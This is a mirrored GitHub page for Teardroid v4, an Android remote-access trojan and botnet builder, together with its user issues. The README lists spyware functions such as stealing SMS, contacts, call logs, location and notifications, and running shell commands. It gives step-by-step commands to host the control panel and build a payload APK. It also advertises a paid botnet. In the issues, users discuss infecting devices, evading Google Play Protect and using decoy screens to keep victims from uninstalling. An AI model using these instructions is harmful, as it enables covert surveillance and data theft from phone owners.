Giter VIP home page Giter VIP logo

script1337 / teardroid-phprat Goto Github PK

View Code? Open in Web Editor NEW
776.0 43.0 308.0 163.13 MB

:india: :robot: It's easy to use android botnet work without port forwarding, vps and android studio

Home Page: https://scatter.sellup.io

License: MIT License

Python 0.02% Shell 0.01% Kotlin 0.09% Batchfile 0.01% Smali 99.87%
android-rat android-botnet botnet rat android-pentesting android-exploitation post-exploitation hacking hacking-tool android-malware

teardroid-phprat's Introduction

โš ๏ธDisclaimer : This software is meant for educational purposes only. I'm not responsible for any malicious use of the app.

๐Ÿค– Teardroid v4

Screenshot

๐Ÿ‡ฎ๐Ÿ‡ณ It's easy to use android botnet work without port forwarding, vps and android studio

GitHub issues Twitter Hacksec visitors

๐Ÿš€ Features

  • Retrieve Contact
  • Retrieve SMS
  • Retrieve running Services
  • Retrieve Device Location (:worried: Only work when the app is open on newer devices)
  • Retrieve Call Logs
  • Run Shell Command ( use findphno command in run shell command to get device phone number and use findx:pdf to find all the pdf files on the device )
  • Change Wallpaper
  • Send SMS
  • Make Call
  • Get Installed Apps
  • Download File
  • Read Notification
  • Auto-Start
  • Add webview in homepage
  • Ignore Battery Optimisation
  • Change icon
  • Get device admin permission

โš ๏ธ Requirement

  • Python3
  • Java
  • Linux or Windows os (we don't support termux use gcloud)
  • For android mobile users use github Codespaces

Java version i used

$ java -version
openjdk version "11.0.13" 2021-10-19
OpenJDK Runtime Environment (build 11.0.13+8)
OpenJDK 64-Bit Server VM (build 11.0.13+8, mixed mode)

Tested on

  • Windows 11
  • Windows 10
  • Manjaro
  • Kali linux
  • Ubuntu
  • macOS Ventura

Run control panel on your own server (recommended)

$ git clone https://github.com/ScRiPt1337/Teardroidv4_api
  • Install uvicorn
$ sudo apt-get install uvicorn
$ sudo apt-get install python3
$ sudo apt-get install python3-pip
$ python3 -m pip install uvicorn
  • Change dir to Teardroidv4_api
$ cd Teardroidv4_api
  • Install all dependency
$ pip install -r requirements.txt
  • change project key to connect with database
  • Set up an account at deta.space and go to collections click on new collection
  • give it a random name and click on create collection
  • it will redirect to the collection page now click on collection settings and click on create data key
  • it will create a new data key copy it and replace DETA_PROJECT_KEY with the key inside database.py
$ nano ./db/database.py
from deta import Deta
from os import getenv

deta = Deta(getenv("DETA_PROJECT_KEY")) => deta =  Deta("demo project key")
# replace getenv("DETA_PROJECT_KEY") with your deta.sh project key
# make sure your remove getenv
  • Run teardroid api
$ screen
# press enter to go inside the screen session
$ uvicorn main:app --host 0.0.0.0 --port 80
# now close your terminal windows  and we are good to go

How to setup the builder ( generate apk payload )

  • Clone Teardroid-phprat repo with the following command.
$ git clone https://github.com/ScRiPt1337/Teardroid-phprat
  • cd in the Teardroid-phprat directory, then type the command below to install all dependencies
$ pip install -r requirements.txt
  • Run the following command to see the options that we can use with the builder.
$ python Teardroid.py
[+] Checking Python Version
[+] Python Version : 3.10 โœ“
  ______                    __           _     __         __ __
 /_  __/__  ____ __________/ /________  (_)___/ /  _   __/ // /
  / / / _ \/ __ `/ ___/ __  / ___/ __ \/ / __  /  | | / / // /_
 / / /  __/ /_/ / /  / /_/ / /  / /_/ / / /_/ /   | |/ /__  __/
/_/  \___/\__,_/_/   \__,_/_/   \____/_/\__,_/    |___/  /_/


Teardroid v4.0 - A tool to build teardroid spyware for Android devices. ๐Ÿ•ท
Contact us : https://t.me/script1337 ๐Ÿš€
usage: Teardroid.py [-h] [-v] [-b]

options:
  -h, --help     show this help message and exit
  -v, --version  Version of Teardroid ๐Ÿฅด
  -b , --build   Build Teardroid with custom name [ex: Teardroid.py -b teardroid] ๐Ÿ˜ท
  • To create an apk execute the following command.
$ python Teardroid.py -b your_app_name
  • It will prompt you with your Control Panel url enter your deta space control panel url without /v4 or your own server url (without / at the end of the url).
  • You will also be prompted for the title and text of the notification. Enter what you want to display on the notification.
  • then it ask you to enter the icon folder path so enter the icon folder path
  • DONE

Note for macOS

  • If you got Permissions Denial in mac os please run chmod 777 * inside Teardroid folder

Dashboard

  • visit : https://{your server url}/v4/overview
  • defualt username/password is : admin/admin

IMPORTANT NOTICE

  • use your own keystore its not recommended to use the defualt keystore you can modify the values in Config.py file to use your own keystore with teardroid v4.

Screenshot

  • Builder

  • Overview

  • TaskManager

Need something more advanced try ( scatter alfa )

  • If you're looking for a reliable and stable botnet that can meet your advanced needs, I would highly recommend taking a look at Scatter Alfa. Scatter Alfa has been specifically designed to provide advanced functionality and persistence over an extended period of time, making it an ideal choice for users who require persistence and stability.
  • Learn more about scatter alfa
  • You can buy it from => https://scatter.sellup.io/
  • Demo video available on my telegram channel => https://t.me/scatter1337

Contact info

teardroid-phprat's People

Contributors

script1337 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

teardroid-phprat's Issues

Error zipalign

error while signning with zipalign i have screenshot
Here
Screenshot_20220210-130118_NetHunter KeX
Plzzz help

"control panel not opening"

Describe the bug
A clear and concise description of what the bug is.

To Reproduce
Steps to reproduce the behavior:

  1. Go to '...'
  2. Click on '....'
  3. Scroll down to '....'
  4. See error

Expected behavior
A clear and concise description of what you expected to happen.

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

  • OS: [e.g. iOS]
  • Browser [e.g. chrome, safari]
  • Version [e.g. 22]

Smartphone (please complete the following information):

  • Device: [e.g. iPhone6]
  • OS: [e.g. iOS8.1]
  • Browser [e.g. stock browser, safari]
  • Version [e.g. 22]

Additional context
"It can show me only"Hello, world" and this brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 132): [/tmp/brut_util_Jar_127028542788686989528405215824808772966.tmp, p, --forced-package-id, 127, --min-sdk-version, 21, --target-sdk-version, 32, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, /tmp/APKTOOL6622058409058653428.tmp, -e, /tmp/APKTOOL2980092642000179113.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/Teardroid-phprat/Teardroid_Payload/res, -M, /root/Teardroid-phprat/Teardroid_Payload/AndroidManifest.xml]
[+] Compiling Teardroid completed! โœ“
[+] Compressing APK Files using zipalign! โœ“
sh: 1: /root/Teardroid-phprat/zipalign: not found
[+] Signing Teardroid! โœ“
Exception in thread "main" java.io.FileNotFoundException: rocky.apk (No such file or directory)
at java.base/java.io.RandomAccessFile.open0(Native Method)
at java.base/java.io.RandomAccessFile.open(RandomAccessFile.java:345)
at java.base/java.io.RandomAccessFile.(RandomAccessFile.java:259)
at java.base/java.io.RandomAccessFile.(RandomAccessFile.java:214)
at com.android.apksig.ApkSigner.sign(ApkSigner.java:190)
at com.android.apksigner.ApkSignerTool.sign(ApkSignerTool.java:381)
at com.android.apksigner.ApkSignerTool.main(ApkSignerTool.java:88)
Traceback (most recent call last):
File "/root/Teardroid-phprat/Teardroid.py", line 103, in
builder(args.build)
File "/root/Teardroid-phprat/Teardroid.py", line 87, in builder
Teardroid.Clear()
File "/root/Teardroid-phprat/Builder.py", line 89, in Clear
os.remove(self.name + ".apk.idsig")
FileNotFoundError: [Errno 2] No such file or directory: 'rocky.apk.idsig'

Teardroid.py can't start show this error

$ python Teardroid.py
[+] Checking Python Version
Traceback (most recent call last):
File "C:\Users\User\Desktop\Soft Source\New folder\Teardroid-phprat\Teardroid.py", line 29, in
if check_python() == False:
File "C:\Users\User\Desktop\Soft Source\New folder\Teardroid-phprat\Teardroid.py", line 22, in check_python
print("[+] Python Version : " +
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\encodings\cp1252.py", line 19, in encode
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
UnicodeEncodeError: 'charmap' codec can't encode character '\u2713' in position 26: character maps to


User@DESKTOP-VJUGN4Q MINGW64 ~/Desktop/Soft Source/New folder/Teardroid-phprat (master)
$ java -version
java version "18.0.1.1" 2022-04-22
Java(TM) SE Runtime Environment (build 18.0.1.1+2-6)
Java HotSpot(TM) 64-Bit Server VM (build 18.0.1.1+2-6, mixed mode, sharing)

User@DESKTOP-VJUGN4Q MINGW64 ~/Desktop/Soft Source/New folder/Teardroid-phprat (master)
$ python --version
Python 3.10.5

Not detecting device

I setup everything and the control panel is working but after infecting a device with the builded apk it won't show up on the list. The phone is called Xiaomi redmi note 9 and got android 11. Antivirus didn't detect it so it shouldn't be a problem.

Devices not showing up

A popup shows on the device, but no virtual machine or physical phone is showing up in the control panel. I tried many different versions of the link, but none made a difference.
A clear and concise description of what the bug is.

Followed all steps and used the Deployment button (not manual installation).

Windows 10
Python Version : 3.10
java version "1.8.0_333"
Java(TM) SE Runtime Environment (build 1.8.0_333-b02)
Java HotSpot(TM) 64-Bit Server VM (build 25.333-b02, mixed mode)
"jdk-8u333-windows-x64.exe" is installed

Log output(always the same):

Visor request (headers):
{
"Accept": "application/json, text/plain, /",
"Connection": "close",
"Referer": "https://[replaced].deta.dev/v4/overview",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36",
"X-Forwarded-Proto": "https",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Site": "same-origin",
"Host": "[replaced].deta.dev",
"Accept-Encoding": "gzip, deflate, br",
"X-Forwarded-Port": "443",
"Sec-Fetch-Mode": "cors",
"Sec-Gpc": "1",
"X-Forwarded-For": "99.82.163.58",
"Accept-Language": "de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7",
"X-Real-Ip": "99.82.163.58"
}

Visor response:
{
"success": true,
"clients": []
}

Logs:
No errors

Visor request (headers):
{
"Accept": "image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8",
"Connection": "close",
"Referer": "https://[replaced].deta.dev/v4/overview",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36",
"X-Forwarded-Proto": "https",
"Sec-Fetch-Dest": "image",
"Sec-Fetch-Site": "same-origin",
"Host": "[replaced].deta.dev",
"Accept-Encoding": "gzip, deflate, br",
"X-Forwarded-Port": "443",
"Sec-Fetch-Mode": "no-cors",
"Sec-Gpc": "1",
"X-Forwarded-For": "99.82.163.58",
"Accept-Language": "de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7",
"X-Real-Ip": "99.82.163.58"
}

Visor respone:
"<!doctype html><html lang="en"><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="Web site created using create-react-app"/><link rel="apple-touch-icon" href="/logo192.png"/><link rel="manifest" href="/manifest.json"/><link rel="stylesheet" href="https://unpkg.com/@shopify/[email protected]/build/esm/styles.css\"/><title>Teardroid v4.0</title><script defer="defer" src="/static/js/main.58405be5.js"></script><link href="/static/css/main.101b48ee.css" rel="stylesheet">You need to enable JavaScript to run this app.<div id="root">"

Logs:
No errors

Need Video Tutorial To Deploy On Ubuntu

I Many Times Try To Deploy But Facing Error I Try Many Times As Tutorial. I Seen And Try Many Andriod Rat But I Love it Thanks for Make Please Solve My Issuse I wana deploy on my server but i cant i try on many server ubnuntu,kali,centos still i cant deploy

hello please i am having problem building

Notification Title : Google
Notification Content : system update
Notification Subtext : today
[+] Changing app name to teardroid!
[+] Changing app name completed!
[+] Changing hostname to https://a3xiyc.deta.dev!
[+] Changing hostname completed!
[+] Changing notification title to Google!
[+] Changing notification content to system update!
[+] Changing notification subtext to today!
[+] Changing notification completed!
[+] Compiling Teardroid using apktool!
I: Using Apktool 2.6.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.AndrolibException: java.io.FileNotFoundException: /home/jamal/.local/share/apktool/framework/1.apk (No such file or directory)
[+] Compiling Teardroid completed!
[+] Compressing APK Files using zipalign!
Unable to open 'teardroid_uncompressed.apk' as zip archive
[+] Signing Teardroid!
Exception in thread "main" java.io.FileNotFoundException: teardroid.apk (No such file or directory)
at java.base/java.io.RandomAccessFile.open0(Native Method)
at java.base/java.io.RandomAccessFile.open(RandomAccessFile.java:345)
at java.base/java.io.RandomAccessFile.(RandomAccessFile.java:259)
at java.base/java.io.RandomAccessFile.(RandomAccessFile.java:214)
at com.android.apksig.ApkSigner.sign(ApkSigner.java:190)
at com.android.apksigner.ApkSignerTool.sign(ApkSignerTool.java:381)
at com.android.apksigner.ApkSignerTool.main(ApkSignerTool.java:88)
Traceback (most recent call last):
File "Teardroid.py", line 83, in
builder(args.build)
File "Teardroid.py", line 71, in builder
Teardroid.Clear()
File "/home/jamal/Teardroid-phprat/Builder.py", line 82, in Clear
os.remove(self.name + ".apk.idsig")
FileNotFoundError: [Errno 2] No such file or directory: 'teardroid.apk.idsig'

Creds

User not found error

I tried default creds

admin
admin

Failed to load signer "signer #1"

Failed to load signer "signer #1"
java.io.IOException: Invalid keystore format
at sun.security.provider.JavaKeyStore.engineLoad(JavaKeyStore.java:666)
at sun.security.provider.JavaKeyStore$JKS.engineLoad(JavaKeyStore.java:57)
at sun.security.provider.KeyStoreDelegator.engineLoad(KeyStoreDelegator.java:215)
at sun.security.provider.JavaKeyStore$DualFormatJKS.engineLoad(JavaKeyStore.java:71)
at java.security.KeyStore.load(KeyStore.java:1445)
at com.android.apksigner.SignerParams.loadKeyStoreFromFile(SignerParams.java:362)
at com.android.apksigner.SignerParams.loadPrivateKeyAndCertsFromKeyStore(SignerParams.java:248)
at com.android.apksigner.SignerParams.loadPrivateKeyAndCerts(SignerParams.java:181)
at com.android.apksigner.ApkSignerTool.getSignerConfig(ApkSignerTool.java:405)
at com.android.apksigner.ApkSignerTool.sign(ApkSignerTool.java:324)
at com.android.apksigner.ApkSignerTool.main(ApkSignerTool.java:88)
Traceback (most recent call last):
File "/home/kali/Teardroid-phprat/Teardroid.py", line 103, in
builder(args.build)
File "/home/kali/Teardroid-phprat/Teardroid.py", line 87, in builder
Teardroid.Clear()
File "/home/kali/Teardroid-phprat/Builder.py", line 89, in Clear
os.remove(self.name + ".apk.idsig")
FileNotFoundError: [Errno 2] No such file or directory: 'com_update_service.apk.idsig'

Change App ICON

Please Enable App Icon and Splash screen for startup unless. Its useless because nobody will keep an app that shows blank screen on thier phone. Make the App do something at least, even if its just a splash screen so they wait and give up but they might not uninstall the app If you convince them that it takes time to load up. They will just give up but wait to try another time like one hunting game i downloaded earlier... it just stays on the splash screen loading... probably a gif decoy.

Make it possible to upload a gif splash screen so the victims see loading...

Error In Deploy On Own Vps

I try to deploy on ubuntu vps but i can't deploy facing error & i deployed on deta.sh 10+ Times But Again And Again Susspend After 1 Days

BUG

Describe the bug
python Teardroid.py
File "Teardroid.py", line 35
apktool: str = os.path.join(os.getcwd(), "apktool.sh")
^
SyntaxError: invalid syntax

Canยดt change icon

Describe the bug
A clear and concise description of what the bug is.

To Reproduce
Steps to reproduce the behavior:

  1. Go to '...'
  2. Click on '....'
  3. Scroll down to '....'
  4. See error

Expected behavior
A clear and concise description of what you expected to happen.

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

  • OS: [e.g. iOS]
  • Browser [e.g. chrome, safari]
  • Version [e.g. 22]

Smartphone (please complete the following information):

  • Device: [e.g. iPhone6]
  • OS: [e.g. iOS8.1]
  • Browser [e.g. stock browser, safari]
  • Version [e.g. 22]

Additional context
Add any other context about the problem here.

Using Own VPS instead

Project is awesome , I wonder if I could use my own vps instead of using data . If there is any way please guide me.

Regards

App crash on ANDROID 12 BASED aosp

App crashes after giving all permissions

To Reproduce
Steps to reproduce the behavior:

  1. Install the app after building
  2. Grant all passion
  3. App crashes and unable to load again

Expected behavior
App opening and new client notification on dashboard

Not even being added on dashboard

FEATURES

Working good thank You sir.ฤฐ approve you.Can you add features Get phone number and get browser history.

video required

can you please share the video again how to hack android phone using Teardroid v4 as youtube has removed it

Esssential Task Not Working in Android 7.1.1 Mobile Phone

Describe the bug
I have installed and run the android app on my test mobile with Android 7.1.1. I tried the tasks featured in Teardroid. But im not successful in executing the "Run Shell Command". The response i got was {"error":"this function is not supported for this version of android"}. Playing around with commands, i tried: "adb shell ls" and still the same response. Any fix for this problem?

Expected behavior
Command: ls
Expected Response: contents of the default directory of the android phone.

Smartphone (please complete the following information):

  • Device: Oppo
  • OS: Android
  • Version: 7.1.1

Zipalign can't be found, can't compress APK!

[+] Compiling Teardroid completed!
[+] Compressing APK Files using zipalign!
'C:\Users\Administrator\Downloads\Teardroid-phprat-master\Teardroid-phprat-master/zipalign' is not recognized as an internal or external command,
operable program or batch file.
[+] Signing Teardroid!
'C:\Users\Administrator\Downloads\Teardroid-phprat-master\Teardroid-phprat-master/apksigner' is not recognized as an internal or external command,
operable program or batch file.
Traceback (most recent call last):
File "C:\Users\Administrator\Downloads\Teardroid-phprat-master\Teardroid-phprat-master\Teardroid.py", line 72, in
builder(args.build)
File "C:\Users\Administrator\Downloads\Teardroid-phprat-master\Teardroid-phprat-master\Teardroid.py", line 61, in builder
Teardroid.Clear()
File "C:\Users\Administrator\Downloads\Teardroid-phprat-master\Teardroid-phprat-master\Builder.py", line 62, in Clear
os.remove(self.name + ".apk.idsig")
FileNotFoundError: [WinError 2] The system cannot find the file specified: 'Kylies_Secrets.apk.idsig'

builder

Screenshot_2022-03-13-04-17-15-929_com offsec nhterm
how i can fix?
run in kali nethunter

error

Describe the bug
A clear and concise description of what the bug is.

To Reproduce
Steps to reproduce the behavior:

  1. Go to '...'
  2. Click on '....'
  3. Scroll down to '....'
  4. See error

Expected behavior
A clear and concise description of what you expected to happen.

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

  • OS: [e.g. iOS]
  • Browser [e.g. chrome, safari]
  • Version [e.g. 22]

Smartphone (please complete the following information):

  • Device: [e.g. iPhone6]
  • OS: [e.g. iOS8.1]
  • Browser [e.g. stock browser, safari]
  • Version [e.g. 22]

Additional context
Add any other context about the problem here.

bug

hi i tried to run your script on my ubuntu server using python 3.10 this is what happen ?
please help me

root@srv190297:/rat/Teardroid-phprat# pip install -r requirements.txt
Requirement already satisfied: pyfiglet in /usr/local/lib/python3.8/dist-packages (from -r requirements.txt (line 1)) (0.8.post1)
Requirement already satisfied: tqdm in /usr/local/lib/python3.8/dist-packages (from -r requirements.txt (line 2)) (4.64.0)
Requirement already satisfied: pydantic in /usr/local/lib/python3.8/dist-packages (from -r requirements.txt (line 3)) (1.9.1)
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (from -r requirements.txt (line 4)) (0.4.3)
Requirement already satisfied: emoji in /usr/local/lib/python3.8/dist-packages (from -r requirements.txt (line 5)) (1.7.0)
Requirement already satisfied: typing-extensions>=3.7.4.3 in /usr/local/lib/python3.8/dist-packages (from pydantic->-r requirements.txt (line 3)) (4.2.0)
root@srv190297:
/rat/Teardroid-phprat# python3.10 Teardroid.py
Traceback (most recent call last):
File "/root/rat/Teardroid-phprat/Teardroid.py", line 7, in
from pyfiglet import Figlet
ModuleNotFoundError: No module named 'pyfiglet'
root@srv190297:~/rat/Teardroid-phprat#

how to bypass google protect!!

ok i create the apk so what how i will bypass google protect always the same problem i changed sdk but i got error and how i will give access to target device?

Issue login.php

the Issue login. PHP 404 error url not found login.html not acces to login.php

Not work

Only work notification (in few hours)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.